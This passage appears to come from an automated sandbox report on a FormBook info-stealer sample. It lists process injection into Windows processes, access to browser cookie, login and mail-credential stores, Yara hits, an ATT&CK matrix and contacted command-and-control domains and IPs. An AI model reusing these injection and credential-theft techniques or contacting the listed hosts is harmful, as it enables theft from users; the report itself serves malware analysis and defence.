            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 5460Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 298A008Jump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fJD7ivEnzm.exe"Jump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: fJD7ivEnzm.exe, IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: fJD7ivEnzm.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: fJD7ivEnzm.exeBinary or memory string: WIN_XP
            Source: fJD7ivEnzm.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: fJD7ivEnzm.exeBinary or memory string: WIN_XPe
            Source: fJD7ivEnzm.exeBinary or memory string: WIN_VISTA
            Source: fJD7ivEnzm.exeBinary or memory string: WIN_7
            Source: fJD7ivEnzm.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529089 Sample: fJD7ivEnzm.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 28 www.woshop.online 2->28 30 www.tekilla.wtf 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 4 other signatures 2->48 10 fJD7ivEnzm.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 IqZHJpXEsts.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 IqZHJpXEsts.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.kexweb.top 63.250.47.40, 50021, 50022, 50023 NAMECHEAP-NETUS United States 22->34 36 bola88site.one 172.96.191.39, 49965, 49979, 49990 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 22->36 38 7 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            fJD7ivEnzm.exe68%ReversingLabsWin32.Backdoor.FormBook
            fJD7ivEnzm.exe100%AviraHEUR/AGEN.1321685
            fJD7ivEnzm.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            		148.72.152.174
            		truetrue
              		unknown
              webredir.vip.gandi.net
              		217.70.184.50
              		truetrue
                		unknown
                www.nobartv6.website
                		103.224.182.242
                		truetrue
                  		unknown
                  www.kexweb.top
                  		63.250.47.40
                  		truetrue
                    		unknown
                    bola88site.one
                    		172.96.191.39
                    		truetrue
                      		unknown
                      www.dyme.tech
                      		13.248.169.48
                      		truetrue
                        		unknown
                        www.mizuquan.top
                        		43.242.202.169
                        		truetrue
                          		unknown
                          redirect.3dns.box
                          		172.191.244.62
                          		truetrue
                            		unknown
                            jobworklanka.online
                            		91.184.0.200
                            		truetrue
                              		unknown
                              omexai.info
                              		3.33.130.190
                              		truetrue
                                		unknown
                                www.tekilla.wtf
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.omexai.info
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.woshop.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.languagemodel.pro
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.bola88site.one
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.jobworklanka.online
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.arlon-commerce.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.kxshopmr.store
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.omexai.info/7xi5/true
                                                  		unknown
                                                  http://www.dyme.tech/h7lb/true
                                                    		unknown
                                                    http://www.kexweb.top/3bdq/true
                                                      		unknown
                                                      http://www.mizuquan.top/e0nr/true
                                                        		unknown
                                                        http://www.languagemodel.pro/nxfn/true
                                                          		unknown
                                                          http://www.bola88site.one/3qit/true
                                                            		unknown
                                                            http://www.jobworklanka.online/ikh0/true
                                                              		unknown
                                                              http://www.tekilla.wtf/fpzw/true
                                                                		unknown

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://duckduckgo.com/ac/?q=netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.mizuquan.topIqZHJpXEsts.exe, 00000007.00000002.3641350832.000000000522C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.gandi.net/en/domainnetbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.ecosia.org/newtab/netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://whois.gandi.net/en/results?search=languagemodel.pronetbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.191.244.62
                                                                        		redirect.3dns.boxUnited States
                                                                        		7018ATT-INTERNET4UStrue
                                                                        63.250.47.40
                                                                        		www.kexweb.topUnited States
                                                                        		22612NAMECHEAP-NETUStrue
                                                                        13.248.169.48
                                                                        		www.dyme.techUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        91.184.0.200
                                                                        		jobworklanka.onlineNetherlands
                                                                        		197902HOSTNETNLtrue
                                                                        172.96.191.39
                                                                        		bola88site.oneCanada
                                                                        		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                        217.70.184.50
                                                                        		webredir.vip.gandi.netFrance
                                                                        		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                                        148.72.152.174
                                                                        		www.elsupertodo.netUnited States
                                                                        		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                        3.33.130.190
                                                                        		omexai.infoUnited States
                                                                        		8987AMAZONEXPANSIONGBtrue
                                                                        43.242.202.169
                                                                        		www.mizuquan.topHong Kong
                                                                        		40065CNSERVERSUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1529089
                                                                        Start date and time:2024-10-08 16:32:21 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 52s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Run name:Run with higher sleep bypass
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:fJD7ivEnzm.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@14/9
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 92%
                                                                        • Number of executed functions: 47
